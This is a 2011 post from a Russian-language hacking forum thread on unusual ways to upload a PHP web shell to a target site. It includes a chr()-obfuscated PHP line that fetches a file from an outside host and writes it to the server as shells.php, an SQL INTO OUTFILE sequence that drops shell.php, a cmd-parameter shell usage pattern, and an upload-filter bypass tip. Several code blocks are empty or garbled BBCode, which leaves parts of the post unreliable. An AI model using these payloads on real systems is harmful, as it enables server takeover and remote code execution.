Тема: Не стандартные способы заливки шелла
Показать сообщение отдельно

  #57  
Старый 15.12.2011, 08:29
XAMEHA
Новичок
Регистрация: 15.05.2010
Сообщений: 0
С нами: 8417113

Репутация: 0
По умолчанию
Цитата:
Сообщение от Osstudio  
"eval(file_get_contents('http://url/ws.txt'));" зачем ты написал эвал, если cmd=... итак эвалится?

Цитата:
Сообщение от KolosJey  
::facepalm::
Объясню:

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]

[/COLOR][/COLOR
Если ты просто так пошлёшь file_get_contents('http://url/ws.txt'), то у тебя будет:

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]

[/COLOR][/COLOR
Т. е. file_get_contents никуда не запишишиться/не выполниться.

Однако в первом случае будет:

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]

[/COLOR][/COLOR
Мы можем просто вписать:

Код:


Eval выполняет функции php, как вы видите, это мини шелл... используют так:





	
Код:

	
host.com/пут_до_той_папки_что_вы_указали/shells.php?cmd=function_php;




Как видите, без кавычек, а тип будет String    Так что теперь делаем код:





	
Код:

	
$url = chr(104).chr(116).chr(116).chr(112).chr(58).chr(47).chr(47).chr(108).chr(101).chr(103).chr(105).chr(111).chr(110).chr(101).chr(114).chr(115).chr(56).chr(56).chr(46).chr(110).chr(97).chr(114).chr(111).chr(100).chr(46).chr(114).chr(117).chr(47).chr(101).chr(114).chr(114).chr(111).chr(114).chr(46).chr(116).chr(120).chr(116);$content = file_get_contents($url);$h = fopen(shells.chr(46).php,w);$text = $content;fwrite($h,$text);fclose($h);


Parse error: syntax error, unexpected T_STRING in * on line 2



вписываем следующее:





	
Код:

	
UPDATE `table_name` SET `column_name_1` = '' WHERE `column_name_2` =[Значение] LIMIT 1 ;
SELECT * FROM `table_name` WHERE `column_name_2` =[Значение] INTO OUTFILE '[Полный_путь_до_папки_с_правами_закачки_файла/shell.php]' ;


Теперь переходим по адресу 





	
Код:

	
host.com/пут_до_той_папки_что_вы_указали/shells.php


Это делается одним запросом.






Цитата:









Сообщение от None  

5.) Пятый вариант - это отличный баг Windows, а именно, иногда сайт не разрешает закачивать PHP таким образом, что когда нажимаешь к примеру на кнопку "Обзор", то он показывает только файлы изображений, и т.п. Но не отчаивайтесь - просто нажмите на этот "Обзор" (

) зайдите в директорию с шеллом, и наберите тут его имя:




Открою секрет - в поле имя напиши *, перед тобой предстанут все файлы.



-------------



Модераторы - перенесите статью в болталку или удалите этот бред, буду благодарен.


		
		
		
		
		
		
			





	
	







 
	
	
		

			
			
			
				Ответить с цитированием